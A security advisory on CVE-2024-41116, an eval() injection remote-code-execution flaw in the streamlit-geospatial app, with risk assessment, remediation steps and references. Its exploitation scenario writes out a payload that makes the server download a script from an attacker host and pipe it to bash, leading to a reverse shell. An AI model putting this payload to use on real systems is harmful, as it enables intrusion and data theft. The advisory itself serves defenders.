CVE-2024-41116: streamlit-geospatial: RCE via eval() injection
CRITICAL PoC AVAILABLE CISA: ATTENDCritical unauthenticated RCE in streamlit-geospatial — any internet-exposed instance is fully owned with a single crafted HTTP request, no credentials needed. Patch immediately to commit c4f81d9616d40c60584e36abb15300853a66e489 or take the app offline until patched. Audit all internal Streamlit ML dashboards for similar eval()/exec() patterns on user-controlled inputs.
Risk Assessment
Maximum practical risk (CVSS 9.8). The attack requires zero authentication, zero user interaction, and zero specialized skill — any attacker who can reach the app over the network can execute arbitrary Python code on the host. Streamlit apps are frequently deployed on internal data science infrastructure with broad network access, privileged cloud credentials, and direct connectivity to ML pipelines and data stores, dramatically amplifying blast radius beyond the app itself.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| streamlit-geospatial | pip | — | No patch |
Do you use streamlit-geospatial? You're affected.
Severity & Risk
Attack Surface
Recommended Action
5 steps-
PATCH
Apply commit c4f81d9616d40c60584e36abb15300853a66e489 immediately — it removes the unsafe eval() call.
-
ISOLATE
If patching is not immediate, restrict network access to the Streamlit app to trusted IPs only; do not expose on 0.0.0.0 without authentication.
-
AUDIT
Search all Streamlit apps in your environment for eval()/exec() calls that process user-supplied input (grep -r 'eval(' --include='*.py').
-
DETECT
Review web server and application logs for anomalous vis_params values containing Python syntax, import statements, or shell invocations.
-
HARDEN
Enforce network segmentation so ML UI dashboards cannot directly reach production data stores or cloud credential stores.
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Classification
Compliance Impact
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2024-41116?
Critical unauthenticated RCE in streamlit-geospatial — any internet-exposed instance is fully owned with a single crafted HTTP request, no credentials needed. Patch immediately to commit c4f81d9616d40c60584e36abb15300853a66e489 or take the app offline until patched. Audit all internal Streamlit ML dashboards for similar eval()/exec() patterns on user-controlled inputs.
Is CVE-2024-41116 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2024-41116, increasing the risk of exploitation.
How to fix CVE-2024-41116?
1. PATCH: Apply commit c4f81d9616d40c60584e36abb15300853a66e489 immediately — it removes the unsafe eval() call. 2. ISOLATE: If patching is not immediate, restrict network access to the Streamlit app to trusted IPs only; do not expose on 0.0.0.0 without authentication. 3. AUDIT: Search all Streamlit apps in your environment for eval()/exec() calls that process user-supplied input (grep -r 'eval(' --include='*.py'). 4. DETECT: Review web server and application logs for anomalous vis_params values containing Python syntax, import statements, or shell invocations. 5. HARDEN: Enforce network segmentation so ML UI dashboards cannot directly reach production data stores or cloud credential stores.
What systems are affected by CVE-2024-41116?
This vulnerability affects the following AI/ML architecture patterns: ML UI dashboards, geospatial AI/ML applications, data science web applications, model experimentation platforms.
What is the CVSS score for CVE-2024-41116?
CVE-2024-41116 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 1.96%.
Technical Details
NVD Description
streamlit-geospatial is a streamlit multipage app for geospatial applications. Prior to commit c4f81d9616d40c60584e36abb15300853a66e489, the `vis_params` variable on line 1254 in `pages/1_📷_Timelapse.py` takes user input, which is later used in the `eval()` function on line 1345, leading to remote code execution. Commit c4f81d9616d40c60584e36abb15300853a66e489 fixes this issue.
Exploitation Scenario
An adversary scans for publicly accessible Streamlit instances or identifies a target organization's internal geospatial ML dashboard via LinkedIn/GitHub recon. They navigate to the Timelapse page and submit a crafted vis_params payload such as __import__('os').system('curl attacker.com/shell.sh | bash') — the eval() on line 1345 executes this directly as Python. The attacker receives a reverse shell running as the data science service account, which typically has read access to cloud storage buckets containing training data, model artifacts, and embedded API keys in environment variables. From there they pivot to exfiltrate proprietary models, poison training datasets, or move laterally to the broader cloud environment.
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H References
- github.com/opengeos/streamlit-geospatial/blob/4b89495f3bdd481998aadf1fc74b10de0f71c237/pages/1_%F0%9F%93%B7_Timelapse.py Product
- github.com/opengeos/streamlit-geospatial/blob/4b89495f3bdd481998aadf1fc74b10de0f71c237/pages/1_%F0%9F%93%B7_Timelapse.py Product
- github.com/opengeos/streamlit-geospatial/commit/c4f81d9616d40c60584e36abb15300853a66e489 Patch
- securitylab.github.com/advisories/GHSL-2024-100_GHSL-2024-108_streamlit-geospatial/ Exploit 3rd Party
- github.com/fkie-cad/nvd-json-data-feeds Exploit
Timeline
Related Vulnerabilities
CVE-2024-41115 9.8 streamlit-geospatial: eval() injection enables RCE
Same package: streamlit CVE-2024-41112 9.8 streamlit-geospatial: RCE via eval() on palette input
Same package: streamlit CVE-2024-41113 9.8 streamlit-geospatial: RCE via eval() in Timelapse page
Same package: streamlit CVE-2024-41114 9.8 streamlit-geospatial: RCE via eval() on palette input
Same package: streamlit CVE-2024-41117 9.8 streamlit-geospatial: eval() injection allows RCE
Same package: streamlit
AI Threat Alert